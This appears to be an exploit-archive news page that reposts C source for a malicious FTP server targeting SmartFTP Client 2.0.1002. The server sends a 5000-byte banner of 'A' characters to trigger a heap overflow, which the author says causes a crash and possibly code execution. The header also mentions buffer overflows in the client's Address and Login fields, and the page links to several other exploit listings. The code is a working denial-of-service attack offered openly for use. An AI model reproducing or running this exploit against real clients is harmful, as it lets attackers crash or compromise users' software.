 |
News Item |
0 |
|
|
/***************************************************************************
* SmartFTP Client v 2.0.1002 Heap Overflow DoS *
* *
* *
* There is remote heap overflow in SmartFTP.
When the app receives a long *
* banner (5000 char) the heap is smashed, leading to DoS and to code *
* execution.
*
* *
* There are also two buffer overflow in the fields Address and Login.
*
* I've reported this to Secunia but it seems they didn't think it was dan- *
* gerous cause they didn't publish anything about.
However a simple drag'n *
* drop could compromise your system.. *
* *
* Have Fun! *
* *
* Coded by Marsu <Marsupilamipowa@hotmail.fr> *
***************************************************************************/
#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#pragma comment(lib, "ws2_32.lib")
int main(int argc, char* argv[])
{
char evilbuff[5000];
sockaddr_in sin;
int server,client;
WSADATA wsaData;
WSAStartup(MAKEWORD(1,1), &wsaData);
server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = htonl(INADDR_ANY);
sin.sin_port = htons( 21 );
bind(server,(SOCKADDR*)&sin,sizeof(sin));
printf("[*] Listening on port 21...\n");
listen(server,5);
printf("[*] Waiting for client ...\n");
client=accept(server,NULL,NULL);
printf("[+] Client connected\n");
memset(evilbuff,'A',5000);
memcpy(evilbuff,"220 ",4);
memcpy(evilbuff+4997,"\r\n\0",3);
if (send(client,evilbuff,strlen(evilbuff),0)==-1)
{
printf("[-] Error in send!\n");
exit(-1);
}
printf("[+] Data sent\n");
Sleep(1500);
if (send(client,"boom?",5,0)==-1)
printf("[+] Crashed? Crashed!\n");
else
printf("[-] Exploit failed!\n");
return 0;
}
.
|
|
»
full story @ source-link: ace
|
| Related Articles: |
»
Xpression News 1.0.1 (archives.php) Remote File Disclosure Exploit
»
S-Gastebuch <= 1.5.3 (gb_pfad) Remote File Include Exploit
»
PHP-Nuke Module Emporium <= 2.3.0 Remote SQL Injection Exploit
»
SendStudio <= 2004.14 (ROOTDIR) Remote File Inclusion Vulnerability
|
|
|
